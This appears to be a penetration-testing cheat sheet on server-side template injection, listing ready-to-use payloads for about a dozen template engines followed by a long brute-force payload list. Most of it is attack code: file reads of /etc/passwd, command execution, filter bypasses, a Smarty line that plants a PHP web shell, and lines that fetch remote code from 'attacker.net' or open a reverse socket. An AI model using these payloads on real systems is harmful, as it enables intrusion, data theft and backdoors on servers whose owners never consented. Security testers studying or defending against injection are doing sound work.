pwny.cc
Search…
Server Side Template Injection (SSTI)

ASP.NET

Razor

1
@(1+2)
2
3
//Command execution
4
@{
5
//Code in C#
6
}
Copied!

CSS

Lessjs

1
#SSRF / LFI
2
@import (inline) "http://localhost";
3
@import (inline) "/etc/passwd";
4
5
#Remote Command Execution
6
body {
7
color: `global.process.mainModule.require("child_process").execSync("id")`;
8
}
Copied!

Java

1
${7*7}
2
${{7*7}}
3
${class.getClassLoader()}
4
${class.getResource("").getPath()}
5
${class.getResource("../../../../../index.htm").getContent()}
6
7
//Retrieve system's environment variables
8
${T(java.lang.System).getenv()}
9
10
//Read File
11
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
12
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
Copied!

Expression Language EL

1
${1+1}
2
#{1+1}
3
4
//DNS Lookup
5
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}
6
7
//Common RCE payloads
8
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
9
''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance(<COMMAND ARRAY/LIST>).start()
10
11
//Method using Runtime
12
#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])}
13
#{session.getAttribute("rtc").setAccessible(true)}
14
#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")}
15
16
//Method using processbuilder
17
${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
18
${request.getAttribute("c").add("cmd.exe")}
19
${request.getAttribute("c").add("/k")}
20
${request.getAttribute("c").add("ping x.x.x.x")}
21
${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
22
${request.getAttribute("a")}
23
24
//Method using Reflection & Invoke
25
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
26
27
//Method using ScriptEngineManager one-liner
28
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}
29
30
//Method using ScriptEngineManager
31
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
Copied!

Freemarker

1
//Read File
2
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('path_to_the_file').toURL().openStream().readAllBytes()?join(" ")}
3
4
//Code Execution
5
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
6
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
7
${"freemarker.template.utility.Execute"?new()("id")}
Copied!

Pebble

1
//Remote Code Execution
2
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
Copied!

Velocity

1
#set($str=$class.inspect("java.lang.String").type)
2
#set($chr=$class.inspect("java.lang.Character").type)
3
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
4
$ex.waitFor()
5
#set($out=$ex.getInputStream())
6
#foreach($i in [1..$out.available()])
7
$str.valueOf($chr.toChars($out.read()))
8
#end
Copied!

JavaScript

Handlebars

1
//Command Execution
2
{{#with "s" as |string|}}
3
{{#with "e"}}
4
{{#with split as |conslist|}}
5
{{this.pop}}
6
{{this.push (lookup string.sub "constructor")}}
7
{{this.pop}}
8
{{#with string.split as |codelist|}}
9
{{this.pop}}
10
{{this.push "return require('child_process').execSync('ls -la');"}}
11
{{this.pop}}
12
{{#each conslist}}
13
{{#with (string.sub.apply 0 codelist)}}
14
{{this}}
15
{{/with}}
16
{{/each}}
17
{{/with}}
18
{{/with}}
19
{{/with}}
20
{{/with}}
Copied!

PHP

Smarty

1
{$smarty.version}
2
{php}echo `id`;{/php} //deprecated in smarty v3
3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
4
{system('ls')} // compatible v3
5
{system('cat index.php')} // compatible v3
Copied!

Twig

1
{{7*7}}
2
{{7*'7'}} would result in 49
3
{{dump(app)}}
4
{{app.request.server.all|join(',')}}
5
6
#File Read
7
"{{'/etc/passwd'|file_except(1,30)}}"@
8
9
#Remote Code Execution
10
{{self}}
11
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
12
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
13
{{['id']|filter('system')}}
14
{{['cat\x20/etc/passwd']|filter('system')}}
15
{{['cat$IFS/etc/passwd']|filter('system')}}
Copied!

Python

Jinja2

1
{{4*4}}[[5*5]]
2
{{7*'7'}} would result in 7777777
3
{{config.items()}}
4
<pre>{% debug %}</pre>
5
6
#Dump all used classes
7
{{ [].class.base.subclasses() }}
8
{{''.class.mro()[1].subclasses()}}
9
{{ ''.__class__.__mro__[2].__subclasses__() }}
10
11
#Dump all config variables
12
{% for key, value in config.iteritems() %}
13
<dt>{{ key|e }}</dt>
14
<dd>{{ value|e }}</dd>
15
{% endfor %}
16
17
#Read remote file
18
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
19
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
20
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
21
22
#Write into remote file
23
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
24
25
#Remote Code Execution
26
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
27
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
28
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
29
{{ cycler.__init__.__globals__.os.popen('id').read() }}
30
{{ joiner.__init__.__globals__.os.popen('id').read() }}
31
{{ namespace.__init__.__globals__.os.popen('id').read() }}
32
33
#Bypass '_'
34
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
35
{{request|attr(["_"*2,"class","_"*2]|join)}}
36
{{request|attr(["__","class","__"]|join)}}
37
{{request|attr("__class__")}}
38
{{request.__class__}}
39
40
#Bypass [ and ]
41
{{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
42
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
43
44
#Bypass |join
45
{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
46
47
#Bypass most common filters
48
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
Copied!

Mako

1
#Access to OS module
2
${self.module.cache.util.os.system("id")}
3
${self.module.runtime.util.os.system("id")}
4
${self.template.module.cache.util.os.system("id")}
5
${self.module.cache.compat.inspect.os.system("id")}
6
${self.__init__.__globals__['util'].os.system('id')}
7
${self.template.module.runtime.util.os.system("id")}
8
${self.module.filters.compat.inspect.os.system("id")}
9
${self.module.runtime.compat.inspect.os.system("id")}
10
${self.module.runtime.exceptions.util.os.system("id")}
11
${self.template.__init__.__globals__['os'].system('id')}
12
${self.module.cache.util.compat.inspect.os.system("id")}
13
${self.module.runtime.util.compat.inspect.os.system("id")}
14
${self.template._mmarker.module.cache.util.os.system("id")}
15
${self.template.module.cache.compat.inspect.os.system("id")}
16
${self.module.cache.compat.inspect.linecache.os.system("id")}
17
${self.template._mmarker.module.runtime.util.os.system("id")}
18
${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
19
${self.template.module.filters.compat.inspect.os.system("id")}
20
${self.template.module.runtime.compat.inspect.os.system("id")}
21
${self.module.filters.compat.inspect.linecache.os.system("id")}
22
${self.module.runtime.compat.inspect.linecache.os.system("id")}
23
${self.template.module.runtime.exceptions.util.os.system("id")}
24
${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
25
${self.context._with_template.module.cache.util.os.system("id")}
26
${self.module.runtime.exceptions.compat.inspect.os.system("id")}
27
${self.template.module.cache.util.compat.inspect.os.system("id")}
28
${self.context._with_template.module.runtime.util.os.system("id")}
29
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
30
${self.template.module.runtime.util.compat.inspect.os.system("id")}
31
${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
32
${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
33
${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
34
${self.template._mmarker.module.cache.compat.inspect.os.system("id")}
35
${self.template.module.cache.compat.inspect.linecache.os.system("id")}
36
${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}
37
${self.template._mmarker.module.filters.compat.inspect.os.system("id")}
38
${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}
39
${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
40
${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}
41
${self.template.module.filters.compat.inspect.linecache.os.system("id")}
42
${self.template.module.runtime.compat.inspect.linecache.os.system("id")}
43
${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}
44
${self.context._with_template._mmarker.module.cache.util.os.system("id")}
45
${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
46
${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
47
${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
48
${self.context._with_template.module.cache.compat.inspect.os.system("id")}
49
${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}
50
${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
51
${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
52
${self.context._with_template.module.filters.compat.inspect.os.system("id")}
53
${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
54
${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
55
${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
Copied!

Ruby

1
<%= 7 * 7 %>
2
#{ 7 * 7 }
3
4
#Read File
5
<%= File.open('/etc/passwd').read %>
6
7
#List files and directories
8
<%= Dir.entries('/') %>
9
10
#Code Execution
11
<%= system('cat /etc/passwd') %>
12
<%= `ls /` %>
13
<%= IO.popen('ls /').readlines() %>
14
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
15
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
Copied!

Intruder Brute Force List

1
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
2
#{ 3 * 3 }
3
#{ 7 * 7 }
4
#{1+1}
5
#{3*3}
6
#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")}
7
#{session.getAttribute("rtc").setAccessible(true)}
8
#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])}
9
${"freemarker.template.utility.Execute"?new()("id")}
10
${1+1}
11
${6*6}
12
${7*7}
13
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
14
${T(java.lang.System).getenv()}
15
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
16
${class.getClassLoader()}
17
${class.getResource("").getPath()}
18
${class.getResource("../../../../../index.htm").getContent()}
19
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}
20
${request.getAttribute("a")}
21
${request.getAttribute("c").add("/k")}
22
${request.getAttribute("c").add("cmd.exe")}
23
${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
24
${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
25
${self.__init__.__globals__['util'].os.system('id')}
26
${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
27
${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
28
${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
29
${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
30
${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
31
${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
32
${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}
33
${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}
34
${self.context._with_template._mmarker.module.cache.util.os.system("id")}
35
${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
36
${self.context._with_template.module.cache.compat.inspect.os.system("id")}
37
${self.context._with_template.module.cache.util.os.system("id")}
38
${self.context._with_template.module.filters.compat.inspect.os.system("id")}
39
${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
40
${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
41
${self.context._with_template.module.runtime.util.os.system("id")}
42
${self.module.cache.compat.inspect.linecache.os.system("id")}
43
${self.module.cache.compat.inspect.os.system("id")}
44
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
45
${self.module.cache.util.compat.inspect.os.system("id")}
46
${self.module.cache.util.os.system("id")}
47
${self.module.filters.compat.inspect.linecache.os.system("id")}
48
${self.module.filters.compat.inspect.os.system("id")}
49
${self.module.runtime.compat.inspect.linecache.os.system("id")}
50
${self.module.runtime.compat.inspect.os.system("id")}
51
${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}
52
${self.module.runtime.exceptions.compat.inspect.os.system("id")}
53
${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
54
${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
55
${self.module.runtime.exceptions.util.os.system("id")}
56
${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
57
${self.module.runtime.util.compat.inspect.os.system("id")}
58
${self.module.runtime.util.os.system("id")}
59
${self.template.__init__.__globals__['os'].system('id')}
60
${self.template._mmarker.module.cache.compat.inspect.os.system("id")}
61
${self.template._mmarker.module.cache.util.os.system("id")}
62
${self.template._mmarker.module.filters.compat.inspect.os.system("id")}
63
${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}
64
${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}
65
${self.template._mmarker.module.runtime.util.os.system("id")}
66
${self.template.module.cache.compat.inspect.linecache.os.system("id")}
67
${self.template.module.cache.compat.inspect.os.system("id")}
68
${self.template.module.cache.util.compat.inspect.os.system("id")}
69
${self.template.module.cache.util.os.system("id")}
70
${self.template.module.filters.compat.inspect.linecache.os.system("id")}
71
${self.template.module.filters.compat.inspect.os.system("id")}
72
${self.template.module.runtime.compat.inspect.linecache.os.system("id")}
73
${self.template.module.runtime.compat.inspect.os.system("id")}
74
${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
75
${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
76
${self.template.module.runtime.exceptions.util.os.system("id")}
77
${self.template.module.runtime.util.compat.inspect.os.system("id")}
78
${self.template.module.runtime.util.os.system("id")}
79
${{3*3}}
80
${{7*7}}
81
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
82
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
83
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
84
<%= 3 * 3 %>
85
<%= 7 * 7 %>
86
<%= Dir.entries('/') %>
87
<%= File.open('/etc/passwd').read %>
88
<%= IO.popen('ls /').readlines() %>
89
<%= `ls /` %>
90
<%= system('cat /etc/passwd') %>
91
<pre>{% debug %}</pre>
92
@(1+2)
93
@(6+5)
94
@import (inline) "/etc/passwd";
95
@import (inline) "http://localhost";
96
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
97
body {color: `global.process.mainModule.require("child_process").execSync("id")`;}
98
{$smarty.version}
99
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
100
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
101
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
102
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
103
{php}echo `id`;{/php}
104
{php}echo `id`;{/php} //deprecated in smarty v3
105
{system('cat index.php')}
106
{system('ls')}
107
{{ ''.__class__.__mro__[2].__subclasses__() }}
108
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
109
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
110
{{ [].class.base.subclasses() }}
111
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
112
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
113
{{ cycler.__init__.__globals__.os.popen('id').read() }}
114
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
115
{{ joiner.__init__.__globals__.os.popen('id').read() }}
116
{{ namespace.__init__.__globals__.os.popen('id').read() }}
117
{{ request }}
118
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
119
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
120
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
121
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
122
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
123
{{''.class.mro()[1].subclasses()}}
124
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
125
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
126
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
127
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
128
{{'a'.toUpperCase()}}
129
{{2*2}}[[3*3]]
130
{{3*'3'}}
131
{{3*3}}
132
{{4*4}}[[5*5]]
133
{{7*'7'}} would result in 49
134
{{7*'7'}} would result in 7777777
135
{{7*7}}
136
{{['cat$IFS/etc/passwd']|filter('system')}}
137
{{['cat\x20/etc/passwd']|filter('system')}}
138
{{['id']|filter('system')}}
139
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
140
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
141
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
142
{{app.request.server.all|join(',')}}
143
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
144
{{config.items()}}
145
{{dump(app)}}
146
{{request.__class__}}
147
{{request|attr("__class__")}}
148
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
149
{{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
150
{{request|attr(["_"*2,"class","_"*2]|join)}}
151
{{request|attr(["__","class","__"]|join)}}
152
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
153
{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
154
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
155
{{self}}
Copied!

References

GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool
GitHub
tplmap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool